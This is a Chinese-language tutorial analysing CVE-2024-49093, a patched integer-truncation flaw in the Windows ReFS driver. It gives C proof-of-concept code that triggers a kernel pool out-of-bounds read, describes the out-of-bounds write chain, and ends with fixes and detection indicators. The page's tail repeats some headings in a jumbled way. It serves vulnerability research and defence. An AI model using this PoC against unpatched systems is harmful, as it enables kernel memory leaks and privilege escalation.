CVE-2024-49093：ReFS 文件系统内核漏洞分析与利用教学<\/h1>

1. 漏洞概述<\/h2>
CVE-2024-49093 是 Microsoft Resilient File System (ReFS) 中的一个内核漏洞，属于数值类型转换不当<\/strong>（CWE-681）类别。该漏洞存在于 `refs.sys<\/code> 驱动中，允许攻击者通过特制的文件操作实现内核池的越界读取和写入<\/strong>，可能进一步导致权限提升或系统崩溃。<\/p>`
`受影响版本<\/strong>：Windows 11 24H2 (Build 26100) 至 26100.2454 已修复版本<\/strong>：KB5048667 补丁（Build 26100.2605 及更高版本）<\/p>`

2. 背景知识：ReFS 基础<\/h2>
2.1 ReFS 核心特性<\/h3>

弹性文件系统<\/strong> (Resilient File System)：Microsoft 开发的现代文件系统，专注于数据可用性、大规模数据扩展性和完整性。<\/li>
写时复制<\/strong> (Copy-on-Write, COW)：数据更新时不就地修改，而是创建新副本，旧数据保持不变直至新数据提交。<\/li>
B+ 树结构<\/strong>：内部使用称为 "MinStore B+" 的 B+ 树变种组织大多数对象（键值表形式）。<\/li>
<\/ul>
2.2 常驻 vs 非常驻属性<\/h3>

常驻属性<\/strong> (Resident)：当文件属性（如数据、ACL等）较小时可内联存储在记录中。<\/li>
非常驻属性<\/strong> (Non-resident)：较大属性由 VCN→LCN 运行列表（runlist）描述其在磁盘上的范围。<\/li>
常驻阈值<\/strong>：默认约为 2 KiB（0x800 字节），超过此值将触发从常驻到非常驻的转换。<\/li>
<\/ul>
3. 漏洞定位与成因<\/h2>
3.1 补丁分析<\/h3>
通过对比补丁前后 refs.sys<\/code> 版本（26100.2454 vs 26100.2605），发现新增两个函数：<\/p>

Feature_4213557561__private_IsEnabledDeviceUsageNoInline()<\/code> (WIL风格特性开关)<\/li>
RefsAddAllocationForResidentWrite()<\/code> (受开关管控的函数)<\/li>
<\/ul>
3.2 漏洞根因<\/h3>
在 RefsAddAllocationForResidentWrite<\/code> 函数中，存在64位到32位的错误截断<\/strong>：<\/p>
有补丁分支<\/strong>（正确）：<\/p>
QuadPart =<\/span> ranges-><\/span>end.QuadPart; \/\/ 使用64位值
<\/span><\/span><\/span><\/span>v23.AllocationSize.QuadPart =<\/span> QuadPart;
<\/span><\/span>v23.FileSize.QuadPart =<\/span> QuadPart;
<\/span><\/span><\/code><\/pre>无补丁分支<\/strong>（存在漏洞）：<\/p>
LowPart =<\/span> ranges-><\/span>end.LowPart; \/\/ 错误地使用低32位
<\/span><\/span><\/span><\/span>v23.AllocationSize.QuadPart =<\/span> LowPart; \/\/ 截断赋值
<\/span><\/span><\/span><\/span>v23.FileSize.QuadPart =<\/span> LowPart;
<\/span><\/span><\/code><\/pre>当写入操作的末端位置（offset + size<\/code>）超过 4GiB 时，高32位被丢弃，仅低32位用于后续的常驻阈值检查和文件尺寸更新。<\/p>
4. 漏洞利用详解<\/h2>
4.1 利用条件<\/h3>
要触发此漏洞，需要满足两个关键条件：<\/p>

写入末端跨4GiB边界<\/strong>：(offset + size)<\/code> 的高32位不为零<\/li>
低32位小于常驻阈值<\/strong>：(offset + size) & 0xFFFFFFFF < 0x800<\/code><\/li>
<\/ol>
4.2 PoC 代码示例<\/h3>
HANDLE h =<\/span> CreateFileW(
<\/span><\/span>    L<\/span>"R:<\/span>\\<\/span>exploit_file"<\/span>,
<\/span><\/span>    GENERIC_READ |<\/span> GENERIC_WRITE,
<\/span><\/span>    FILE_SHARE_READ |<\/span> FILE_SHARE_WRITE |<\/span> FILE_SHARE_DELETE,
<\/span><\/span>    NULL,
<\/span><\/span>    CREATE_ALWAYS,
<\/span><\/span>    FILE_ATTRIBUTE_NORMAL |<\/span> FILE_FLAG_NO_BUFFERING, \/\/ 非缓存I\/O
<\/span><\/span><\/span><\/span>    NULL);
<\/span><\/span>
<\/span><\/span>DWORD written =<\/span> 0<\/span>;
<\/span><\/span>BYTE buffer[0x200<\/span>];
<\/span><\/span>OVERLAPPED ov =<\/span> {};
<\/span><\/span>ov.Offset =<\/span> 0<\/span>;      \/\/ 低32位
<\/span><\/span><\/span><\/span>ov.OffsetHigh =<\/span> 1<\/span>;  \/\/ 高32位=1，使写入末端 > 4GiB
<\/span><\/span><\/span><\/span>
<\/span><\/span>WriteFile(h, buffer, sizeof<\/span>(buffer), &<\/span>written, &<\/span>ov);
<\/span><\/span><\/code><\/pre>4.3 不一致状态创建<\/h3>
成功执行后，文件处于不一致状态：<\/p>

AllocationSize<\/strong> = 0x200 (实际分配大小)<\/li>
FileSize\/EndOfFile<\/strong> = 0x100000200 (声明的文件大小)<\/li>
<\/ul>
这种 AllocationSize ≪≪ FileSize<\/code> 的不一致是后续利用的基础。<\/p>
5. 越界读 (OOB Read) 利用<\/h2>
5.1 利用原理<\/h3>
当读取长度超过实际分配大小时，RefsNonCachedResidentRead<\/code> 函数：<\/p>

通过 MsFindRow<\/code> 在 MinStore B+ 表中查找常驻属性记录<\/li>
使用 CmsRowWithBuffer::CopyRow<\/code> 将记录复制到内核池缓冲区<\/li>
执行 memmove(user_buffer, kernel_buffer, read_length)<\/code> 将数据复制到用户空间<\/li>
<\/ol>
由于内核池缓冲区实际大小仅为 0x200-0x600 字节，但读取长度可达 0x1000，导致复制时读取池缓冲区之后的数据。<\/p>
5.2 越界读示例<\/h3>
\/\/ 续前PoC代码
<\/span><\/span><\/span><\/span>DWORD readBytes =<\/span> 0x1000<\/span>;
<\/span><\/span>BYTE*<\/span> readBuffer =<\/span> (BYTE*<\/span>)VirtualAlloc(NULL, readBytes, MEM_COMMIT, PAGE_READWRITE);
<\/span><\/span>DWORD bytesRead =<\/span> 0<\/span>;
<\/span><\/span>OVERLAPPED readOv =<\/span> {};
<\/span><\/span>readOv.Offset =<\/span> 0<\/span>;
<\/span><\/span>readOv.OffsetHigh =<\/span> 0<\/span>;
<\/span><\/span>
<\/span><\/span>ReadFile(h, readBuffer, readBytes, &<\/span>bytesRead, &<\/span>readOv);
<\/span><\/span>\/\/ 此时 readBuffer[0x200] 之后包含内核池数据
<\/span><\/span><\/span><\/code><\/pre>6. 越界写 (OOB Write) 利用<\/h2>
6.1 利用原理<\/h3>
越界写需要更复杂的操作链：<\/p>

首次写入<\/strong>：写入 0x200 字节数据（保持常驻）<\/li>
触发漏洞<\/strong>：通过漏洞将 AllocationSize<\/code> 截断为 0<\/li>
再次写入<\/strong>：写入较大数据（如 0x700），触发 RefsConvertToNonResident<\/code><\/li>
转换过程<\/strong>：

计算目标大小：allocate_size = 0<\/code>（因 AllocationSize=0）<\/li>
分配池内存：仅分配最小块（0x20 字节）<\/li>
数据迁移：将原始数据（0x200-0x700 字节）复制到小缓冲区<\/li>
<\/ul>
<\/li>
<\/ol>
6.2 关键函数调用栈<\/h3>
RefsConvertToNonResident
  → RefsInitializeScbAttributeKey
  → MsUpdateMetaRow
    → CmsBPlusTable::UpdateInIndex
<\/code><\/pre>
6.3 越界写效果<\/h3>
最终在仅 0x20 字节的池缓冲区上执行最多 0x7F0 字节的写入，实现内核池越界写。<\/p>
7. 技术细节深度分析<\/h2>
7.1 关键数据结构<\/h3>
struct<\/span> READ_RANGE<\/span> {
<\/span><\/span>    LARGE_INTEGER offset;    \/\/ 写入偏移
<\/span><\/span><\/span><\/span>    LARGE_INTEGER end;       \/\/ 写入末端 (offset + size)
<\/span><\/span><\/span><\/span>    LARGE_INTEGER size;      \/\/ 写入长度
<\/span><\/span><\/span><\/span>};
<\/span><\/span>
<\/span><\/span>struct<\/span> CmsRowWithBuffer<\/span> {
<\/span><\/span>    _CmsRow row;             \/\/ 键值行
<\/span><\/span><\/span><\/span>    BYTE*<\/span> storage;           \/\/ 存储指针
<\/span><\/span><\/span><\/span>    INT8 flags;              \/\/ 标志位
<\/span><\/span><\/span><\/span>    INT32 capacity;          \/\/ 容量
<\/span><\/span><\/span><\/span>    INT8 inline_storage[32<\/span>]; \/\/ 内联存储
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>7.2 池分配机制<\/h3>
在 CmsRowWithBuffer::CopyRow<\/code> 中：<\/p>
if<\/span> (required_size ><\/span> cmsBuffer-><\/span>capacity) {
<\/span><\/span>    new_size =<\/span> 8<\/span> *<\/span> ((required_size +<\/span> 7<\/span>) \/<\/span> 8<\/span>); \/\/ 8字节对齐
<\/span><\/span><\/span><\/span>    new_pool =<\/span> ExAllocatePoolWithTag(PagedPool, new_size, '<\/span>iPSM'<\/span>);
<\/span><\/span>    \/\/ ... 替换 storage 指针
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用中，此机制被用于分配不匹配的缓冲区大小。<\/p>
7.3 常驻阈值检查<\/h3>
修复前的错误检查：<\/p>
\/\/ 错误：仅使用低32位进行阈值检查
<\/span><\/span><\/span><\/span>if<\/span> (LowPart >=<\/span> 0x800<\/span>) {
<\/span><\/span>    RefsConvertToNonResident(...);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>8. 漏洞修复方案<\/h2>
微软通过特性开关而非直接修改逻辑的方式修复：<\/p>

添加 Feature_4213557561__private_IsEnabledDeviceUsageNoInline()<\/code> 检测<\/li>
在启用新特性时使用正确的64位比较：
if<\/span> (ranges-><\/span>end.QuadPart ><\/span> 0x20000<\/span>) \/\/ 使用完整64位值
<\/span><\/span><\/span><\/code><\/pre><\/li>
确保始终使用 QuadPart<\/code> 而非 LowPart<\/code> 进行大小比较和赋值<\/li>
<\/ol>
9. 缓解措施与检测建议<\/h2>
9.1 临时缓解<\/h3>

禁用 ReFS 文件系统（如无需使用）<\/li>
启用驱动保护（但可能影响PoC测试）<\/li>
<\/ul>
9.2 检测指标<\/h3>

异常文件操作：创建大量末端 >4GiB 但内容很小的文件<\/li>
特定错误代码：0xC0000427、0xC00000BB、0xC00000D8<\/li>
内核池分配标签：'iPSM' 异常分配模式<\/li>
<\/ul>
10. 总结与启示<\/h2>
CVE-2024-49093 展示了内核开发中数值类型处理的重要性：<\/p>

始终使用适当位宽<\/strong>：在可能超过32位的场景中坚持使用64位运算<\/li>
防御性编程<\/strong>：对来自用户空间的数据进行严格验证<\/li>
COW文件系统复杂性<\/strong>：写时复制机制增加了状态管理复杂度<\/li>
分层修复策略<\/strong>：特性开关允许可控的修复回滚<\/li>
<\/ol>
此漏洞需要结合池风水、对象布局等高级利用技术才能实现稳定利用，但基本原理已为内核安全研究提供了重要参考。<\/p>
参考文献<\/h2>

Microsoft Security Guidance: CVE-2024-49093<\/li>
ReFS Documentation: https:\/\/github.com\/libyal\/libfsrefs<\/li>
Windows Internals, 7th Edition, Microsoft Press<\/li>
Winbindex: https:\/\/winbindex.m417z.com\/<\/li>
<\/ol>

CVE-2024-49093：ReFS 文件系统内核漏洞分析与利用教学<\/h1>

3. 漏洞定位与成因<\/h2>

6. 越界写 (OOB Write) 利用<\/h2>

6.3 越界写效果<\/h3> 最终在仅 0x20 字节的池缓冲区上执行最多 0x7F0 字节的写入，实现内核池越界写。<\/p>

7. 技术细节深度分析<\/h2>

9. 缓解措施与检测建议<\/h2>

参考文献<\/h2> Microsoft Security Guidance: CVE-2024-49093<\/li> ReFS Documentation: https:\/\/github.com\/libyal\/libfsrefs<\/li> Windows Internals, 7th Edition, Microsoft Press<\/li> Winbindex: https:\/\/winbindex.m417z.com\/<\/li> <\/ol>

6.3 越界写效果<\/h3>
最终在仅 0x20 字节的池缓冲区上执行最多 0x7F0 字节的写入，实现内核池越界写。<\/p>

参考文献<\/h2>

Microsoft Security Guidance: CVE-2024-49093<\/li>
ReFS Documentation: https:\/\/github.com\/libyal\/libfsrefs<\/li>
Windows Internals, 7th Edition, Microsoft Press<\/li>
Winbindex: https:\/\/winbindex.m417z.com\/<\/li> <\/ol>